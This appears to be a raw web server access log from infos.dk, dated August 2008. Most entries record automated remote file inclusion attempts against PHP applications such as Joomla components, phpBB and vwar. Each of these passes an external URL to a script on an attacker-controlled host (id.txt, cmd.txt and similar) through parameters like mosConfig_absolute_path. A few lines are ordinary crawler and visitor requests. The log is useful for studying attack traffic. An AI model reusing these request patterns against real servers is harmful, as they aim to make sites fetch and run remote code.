194.79.75.195 - - [02/Aug/2008:12:20:18 +0200] "GET //skin/zero_vote/error.php?dir=http://www.brasiliasp.br/branet/includes/tcl??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
89.186.1.54 - - [02/Aug/2008:12:25:05 +0200] "GET /err-r_log-www.infos.dk//faqsupport/samplefaqsupport.php?path[docroot]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:12:25:06 +0200] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
216.246.78.8 - - [02/Aug/2008:12:32:29 +0200] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.246.29.52 - - [02/Aug/2008:12:32:29 +0200] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.246.78.8 - - [02/Aug/2008:12:36:17 +0200] "GET /err-r_log-www.infos.dk//index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.246.78.8 - - [02/Aug/2008:12:36:17 +0200] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/id4.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
72.9.155.94 - - [02/Aug/2008:12:36:56 +0200] "GET //errors.php?error=http://www.elettrostudio.ch/swf/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
72.9.155.94 - - [02/Aug/2008:12:36:56 +0200] "GET //errors.php?error=http://www.elettrostudio.ch/swf/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.246.29.52 - - [02/Aug/2008:12:37:28 +0200] "GET /err-r_log-www.infos.dk//index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.246.29.52 - - [02/Aug/2008:12:37:28 +0200] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
190.196.2.205 - - [02/Aug/2008:12:40:30 +0200] "GET /err-r_log-www.infos.dk//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
190.196.2.205 - - [02/Aug/2008:12:40:31 +0200] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
213.236.10.71 - - [02/Aug/2008:12:41:52 +0200] "GET //index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.toxiii.com/includes/includes/m??? HTTP/1.1" 302 214 "-" "Mozilla/3.0 (OS/2; U)"
85.17.162.125 - - [02/Aug/2008:12:42:51 +0200] "GET /includes/functions_portal.php?phpbb_root_path=http://www.freexhost.info/users/gardhenal/mic22.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
74.6.22.159 - - [02/Aug/2008:12:50:21 +0200] "GET /robots.txt HTTP/1.0" 302 202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.159 - - [02/Aug/2008:12:50:22 +0200] "GET /err-r_log-www.infos.dk HTTP/1.0" 200 39666 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.29.52 - - [02/Aug/2008:12:50:34 +0200] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
70.85.102.132 - - [02/Aug/2008:13:03:47 +0200] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
208.116.36.253 - - [02/Aug/2008:13:16:18 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_chronocontact&Itemid=70/index.php?_REQUEST=&_REQUEST[option]=com_chronocontact&_REQUEST[Itemid=&GLOBALS=&mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
208.116.36.253 - - [02/Aug/2008:13:16:18 +0200] "GET /index.php?option=com_chronocontact&Itemid=70/index.php?_REQUEST=&_REQUEST[option]=com_chronocontact&_REQUEST[Itemid=&GLOBALS=&mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
74.220.215.216 - - [02/Aug/2008:13:21:31 +0200] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
74.220.215.216 - - [02/Aug/2008:13:21:31 +0200] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
74.220.215.216 - - [02/Aug/2008:13:26:03 +0200] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
195.70.36.107 - - [02/Aug/2008:13:42:18 +0200] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.141.50.212 - - [02/Aug/2008:13:45:34 +0200] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
220.110.178.66 - - [02/Aug/2008:13:52:43 +0200] "GET /?path[docroot]=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 200 3425 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.10.140.162 - - [02/Aug/2008:13:54:04 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.club-8.nl/administrator/components/com_seyret/style/cmdp.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:13:56:42 +0200] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:13:56:42 +0200] "GET /err-r_log-www.infos.dk//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
74.53.240.146 - - [02/Aug/2008:14:06:39 +0200] "GET //include/bbs.lib.inc.php?site_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.10.140.162 - - [02/Aug/2008:14:10:42 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://www.club-8.nl/administrator/components/com_seyret/style/cmdp.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
85.10.140.162 - - [02/Aug/2008:14:10:43 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.club-8.nl/administrator/components/com_seyret/style/cmdp.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.75.240.22 - - [02/Aug/2008:14:13:12 +0200] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://szkola.tuchomie.pl/portal/modules/Statystyki/language/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.53.152.210 - - [02/Aug/2008:14:14:27 +0200] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sak4w/taf/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
74.53.152.210 - - [02/Aug/2008:14:14:27 +0200] "GET /err-r_log-www.infos.dk//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sak4w/taf/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
216.245.192.26 - - [02/Aug/2008:14:20:39 +0200] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
205.134.240.228 - - [02/Aug/2008:14:20:48 +0200] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
89.186.1.54 - - [02/Aug/2008:14:20:55 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:14:20:55 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:14:20:55 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:14:21:00 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:14:21:00 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:14:21:00 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
85.17.10.109 - - [02/Aug/2008:14:21:37 +0200] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
216.245.192.26 - - [02/Aug/2008:14:23:34 +0200] "GET //errors.php?error=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
205.134.240.228 - - [02/Aug/2008:14:23:47 +0200] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
85.17.10.109 - - [02/Aug/2008:14:24:07 +0200] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.126.46.141 - - [02/Aug/2008:14:28:18 +0200] "GET /includes/useragent.inc.php?prefix=http://superspeedlearning.com/test.txt? HTTP/1.1" 302 214 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.53.240.146 - - [02/Aug/2008:14:28:20 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
74.53.240.146 - - [02/Aug/2008:14:28:21 +0200] "GET //include/bbs.lib.inc.php?site_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
151.1.210.219 - - [02/Aug/2008:14:31:17 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
217.172.161.101 - - [02/Aug/2008:14:32:35 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.111.172.23 - - [02/Aug/2008:14:38:21 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
70.85.102.132 - - [02/Aug/2008:14:42:05 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
89.108.66.227 - - [02/Aug/2008:14:42:38 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
89.108.66.227 - - [02/Aug/2008:14:42:43 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
85.214.32.233 - - [02/Aug/2008:14:45:12 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.214.32.233 - - [02/Aug/2008:14:45:13 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
77.240.226.168 - - [02/Aug/2008:14:45:30 +0200] "GET ///vwar/backup/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
213.254.226.234 - - [02/Aug/2008:14:50:33 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
213.254.226.234 - - [02/Aug/2008:14:50:34 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
82.194.67.123 - - [02/Aug/2008:14:54:34 +0200] "GET /index.php?site_path=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
216.245.192.26 - - [02/Aug/2008:14:57:09 +0200] "GET /err-r_log-www.infos.dk//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
216.245.192.26 - - [02/Aug/2008:14:57:13 +0200] "GET /err-r_log-www.infos.dk//errors.php?error=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
213.191.144.10 - - [02/Aug/2008:14:58:57 +0200] "GET /errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
70.85.102.132 - - [02/Aug/2008:14:59:37 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
204.10.38.130 - - [02/Aug/2008:15:02:24 +0200] "GET /err-r_log-www.infos.dk/index.php?inc=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
204.10.38.130 - - [02/Aug/2008:15:02:25 +0200] "GET /index.php?inc=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
62.75.240.22 - - [02/Aug/2008:15:02:50 +0200] "GET /skin/zero_vote/vote_list.php?dir=http://szkola.tuchomie.pl/portal/modules/Statystyki/language/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
212.242.105.254 - - [02/Aug/2008:15:05:41 +0200] "GET /Data/side1.htm HTTP/1.1" 200 607 "http://images.google.dk/imgres?imgurl=http://www.infos.dk/Data/holger%2520danske.jpg&imgrefurl=http://www.infos.dk/Data/side1.htm&h=400&w=266&sz=20&hl=da&start=1&um=1&tbnid=IJgwyABbHUcMTM:&tbnh=124&tbnw=82&prev=/images%3Fq%3DHolger%2Bdanske%26um%3D1%26hl%3Dda%26rlz%3D1T4ADBS_daDK264DK265" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
212.242.105.254 - - [02/Aug/2008:15:05:41 +0200] "GET /Data/holger%20danske.jpg HTTP/1.1" 200 20253 "http://www.infos.dk/Data/side1.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
212.242.105.254 - - [02/Aug/2008:15:05:42 +0200] "GET /favicon.ico HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
85.17.162.125 - - [02/Aug/2008:15:10:47 +0200] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freexhost.info/users/gardhenal/mic22.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
213.191.144.10 - - [02/Aug/2008:15:13:24 +0200] "GET /errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
213.198.59.92 - - [02/Aug/2008:15:13:29 +0200] "GET /errors.php?error=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.198.59.92 - - [02/Aug/2008:15:13:30 +0200] "GET /err-r_log-www.infos.dk%20/errors.php?error=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.198.59.92 - - [02/Aug/2008:15:15:31 +0200] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/echo.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
217.172.161.101 - - [02/Aug/2008:15:16:34 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
195.70.36.107 - - [02/Aug/2008:15:20:36 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
195.70.36.107 - - [02/Aug/2008:15:20:37 +0200] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.198.59.92 - - [02/Aug/2008:15:24:32 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://www.brazebo.it/echo.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.198.59.92 - - [02/Aug/2008:15:24:33 +0200] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/echo.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
151.1.210.219 - - [02/Aug/2008:15:27:55 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
213.191.144.10 - - [02/Aug/2008:15:27:59 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.17.162.125 - - [02/Aug/2008:15:30:26 +0200] "GET /err-r_log-www.infos.dk/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freexhost.info/users/gardhenal/mic22.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
89.108.66.227 - - [02/Aug/2008:15:36:30 +0200] "GET /err-r_log-www.infos.dk//include/lib.inc.php?site_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
89.108.66.227 - - [02/Aug/2008:15:36:32 +0200] "GET //include/lib.inc.php?site_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
62.75.240.22 - - [02/Aug/2008:15:39:09 +0200] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://szkola.tuchomie.pl/portal/modules/Statystyki/language/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
213.191.144.10 - - [02/Aug/2008:15:41:13 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
213.191.144.10 - - [02/Aug/2008:15:43:26 +0200] "GET //newspublish/include.php?path%5Bdocroot%5D=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
62.169.0.50 - - [02/Aug/2008:15:47:50 +0200] "GET /convert/mvcw.php?step=1&vwar_root=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
195.70.36.107 - - [02/Aug/2008:15:55:33 +0200] "GET /err-r_log-www.infos.dk//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
195.70.36.107 - - [02/Aug/2008:15:55:33 +0200] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.2.28.165 - - [02/Aug/2008:16:14:04 +0200] "GET ///vwar/backup/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.152.178.42 - - [02/Aug/2008:16:16:20 +0200] "GET /main.php?baseDir=http://www.fireandrescueaustralia.com/tmp/id.txt? HTTP/1.0" 302 202 "-" "libwww-perl/5.48"
213.191.144.10 - - [02/Aug/2008:16:17:22 +0200] "GET /err-r_log-www.infos.dk//newspublish/include.php?path%5Bdocroot%5D=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
83.2.28.165 - - [02/Aug/2008:16:17:58 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.2.28.165 - - [02/Aug/2008:16:18:00 +0200] "GET ///vwar/backup/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
204.15.10.22 - - [02/Aug/2008:16:22:29 +0200] "GET //oneadmin/faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
193.178.228.12 - - [02/Aug/2008:16:23:44 +0200] "GET //oneadmin/faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
83.170.114.48 - - [02/Aug/2008:16:26:24 +0200] "GET /errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.169.0.50 - - [02/Aug/2008:16:27:26 +0200] "GET //oneadmin/faqsupport/samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
83.170.114.48 - - [02/Aug/2008:16:28:33 +0200] "GET ///vwar/backup/errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.89.34.54 - - [02/Aug/2008:16:28:46 +0200] "GET /Data/side1.htm HTTP/1.1" 200 607 "http://images.google.com/imgres?imgurl=http://www.infos.dk/Data/holger%2520danske.jpg&imgrefurl=http://www.infos.dk/Data/side1.htm&h=400&w=266&sz=20&hl=en&start=2&tbnid=IJgwyABbHUcMTM:&tbnh=124&tbnw=82&prev=/images%3Fq%3Dholger%2Bdanske%26gbv%3D2%26hl%3Den" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)"
83.89.34.54 - - [02/Aug/2008:16:28:47 +0200] "GET /Data/holger%20danske.jpg HTTP/1.1" 200 20253 "http://www.infos.dk/Data/side1.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)"
83.89.34.54 - - [02/Aug/2008:16:28:47 +0200] "GET /favicon.ico HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)"
88.84.151.157 - - [02/Aug/2008:16:29:58 +0200] "GET /err-r_log-www.infos.dk/index.php?content=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
88.84.151.157 - - [02/Aug/2008:16:29:58 +0200] "GET /index.php?content=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
195.42.160.22 - - [02/Aug/2008:16:32:31 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=%20http://www.grupslactancia.info/id.txt??? HTTP/1.0" 302 202 "-" "libwww-perl/5.48"
195.42.160.22 - - [02/Aug/2008:16:32:32 +0200] "GET /errors.php?error=%20http://www.grupslactancia.info/id.txt??? HTTP/1.0" 302 202 "-" "libwww-perl/5.48"
83.170.114.48 - - [02/Aug/2008:16:36:33 +0200] "GET /errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
64.22.89.194 - - [02/Aug/2008:16:39:59 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:16:39:59 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.87.132 - - [02/Aug/2008:16:40:12 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
72.232.71.106 - - [02/Aug/2008:16:40:21 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:16:40:21 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:16:40:21 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.159.91.143 - - [02/Aug/2008:16:40:53 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
